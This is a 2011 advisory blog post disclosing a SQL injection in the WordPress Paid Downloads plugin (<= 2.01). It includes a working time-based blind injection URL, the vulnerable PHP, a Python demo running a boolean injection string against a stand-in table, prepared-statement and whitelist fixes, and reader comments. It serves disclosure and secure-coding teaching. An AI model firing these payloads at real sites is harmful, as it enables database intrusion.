WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
Thursday, September 8, 2011

# Exploit Title: WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
# Date: 2011-09-07
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/paid-downloads.2.01.zip
# Version: 2.01 (tested)
# Note: magic_quotes has to be turned off (with magic_quotes_gpc on, the single quote in the payload arrives backslash-escaped and the injection fails)

--- PoC ---

http://www.site.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

This is a time-based blind injection: the single quote closes the string literal, BENCHMARK() hashes the string "sqlmap" (CHAR(115,113,108,109,97,112)) 5,000,000 times so that a true condition produces a visible delay, and "--%20" comments out the trailing quote (the trailing space is needed for MySQL to honour the comment).

--------------- Vulnerable code ---------------

$download_key = $_GET["download_key"];
$sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
$link_details = $wpdb->get_row($sql, ARRAY_A);

p.s. author has been contacted (no reply yet)
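How the injection lands in the concatenated query, and what each of the input treatments discussed on this page does to it, as an added Python example (not code from the advisory or from the Paid Downloads plugin). The table prefix `wp_`, the column names and the rows are assumptions constructed for the demo; the SQLite table stands in for the MySQL one, so the MySQL-only BENCHMARK() payload is only shown as text and a boolean variant of the same injection is run instead.

```python
"""Added example, not code from the advisory or from the Paid Downloads plugin.

Reconstructs how download.php (<= 2.01) builds its query from the
download_key parameter and runs three treatments of the input against a
throwaway SQLite table that stands in for wp_pd_downloadlinks.  Table
prefix, column names and rows are constructed for the demo.
"""
import re
import sqlite3

PREFIX = "wp_"  # assumed WordPress table prefix

# The advisory's PoC, URL-decoded.  The trailing space (%20 in the URL)
# is required for MySQL to treat "--" as a comment.  CHAR(115,...,112)
# spells "sqlmap"; BENCHMARK hashes it 5,000,000 times, so a slow reply
# tells a blind attacker the injected condition was evaluated.
POC_PAYLOAD = ("-1' AND 1=IF(2>1,BENCHMARK(5000000,"
               "MD5(CHAR(115,113,108,109,97,112))),0)-- ")


def build_query_vulnerable(download_key: str) -> str:
    """Same concatenation as the <= 2.01 code: the value lands inside the quotes unescaped."""
    return ("SELECT * FROM " + PREFIX + "pd_downloadlinks WHERE download_key = '"
            + download_key + "'")


def addslashes(value: str) -> str:
    """What PHP's magic_quotes_gpc did to every GET value (PHP addslashes()):
    backslash-escape backslash, single quote, double quote and NUL."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\x00", "\\0"))


def sanitize_2_21(download_key: str) -> str:
    """The plugin author's 2.21 fix: preg_replace('/[^a-zA-Z0-9]/', '', $key)."""
    return re.sub(r"[^a-zA-Z0-9]", "", download_key)


def _demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_pd_downloadlinks "
        "(id INTEGER PRIMARY KEY, download_key TEXT, file TEXT)"
    )
    conn.executemany(  # constructed rows
        "INSERT INTO wp_pd_downloadlinks (download_key, file) VALUES (?, ?)",
        [("a1b2c3d4", "paid.zip"), ("ffee0011", "other.zip")],
    )
    return conn


# IF()/BENCHMARK() are MySQL-only, so against the SQLite stand-in use a
# boolean variant of the same injection: the quote closes the literal,
# OR 1=1 matches every row, and the comment swallows the closing quote.
BOOL_PAYLOAD = "-1' OR 1=1-- "


def rows_vulnerable(download_key: str) -> list:
    """Runs the concatenated query exactly as the plugin built it."""
    return _demo_db().execute(build_query_vulnerable(download_key)).fetchall()


def rows_prepared(download_key: str) -> list:
    """Parameterised query: the value travels as data, so quotes and comment
    markers in it never reach the SQL parser.  In WordPress the equivalent is
    $wpdb->prepare("... WHERE download_key = %s", $download_key)."""
    return _demo_db().execute(
        "SELECT * FROM wp_pd_downloadlinks WHERE download_key = ?",
        (download_key,),
    ).fetchall()


if __name__ == "__main__":
    print(build_query_vulnerable(POC_PAYLOAD))
    # What the commenter saw with magic_quotes on.  Printed only: backslash
    # escaping is a MySQL string rule, SQLite would not honour it.
    print(build_query_vulnerable(addslashes(POC_PAYLOAD)))
    print(build_query_vulnerable(sanitize_2_21(POC_PAYLOAD)))
    print(len(rows_vulnerable(BOOL_PAYLOAD)), "rows leaked by concatenation")
    print(len(rows_prepared(BOOL_PAYLOAD)), "rows from the prepared query")
```

The whitelist in 2.21 works here only because a download key is genuinely alphanumeric; the general fix that does not depend on the shape of the value is `$wpdb->prepare()`, which is also what keeps the query safe once magic_quotes is gone (it was deprecated in PHP 5.3 and removed in 5.4).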
4 comments:
If magic quotes is on, you get this: SELECT * FROM TABLE_downloadlinks WHERE download_key = '1\' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--
Well, I know :). Have you read the note: "magic_quotes has to be turned off"? Please go here for more information. Lots of admins tend to disable it forcefully because they are annoyed by the inserted slashes, which makes them susceptible to this kind of attack.
Hi Miroslav. I'm the author of the Paid Downloads plugin. Thanks for showing the security issue. Fixed it in version 2.21:
[code]
$download_key = $_GET["download_key"];
// keep only [a-zA-Z0-9], so the quote the PoC relies on can no longer reach the query
$download_key = preg_replace('/[^a-zA-Z0-9]/', '', $download_key);
$sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
[/code]
http://wordpress.org/extend/plugins/paid-downloads/
Now I'm getting the notice "ERROR: Service is not available" every time I try to upload a file, since the version 2.22 upgrade. Any ideas?
-Garrett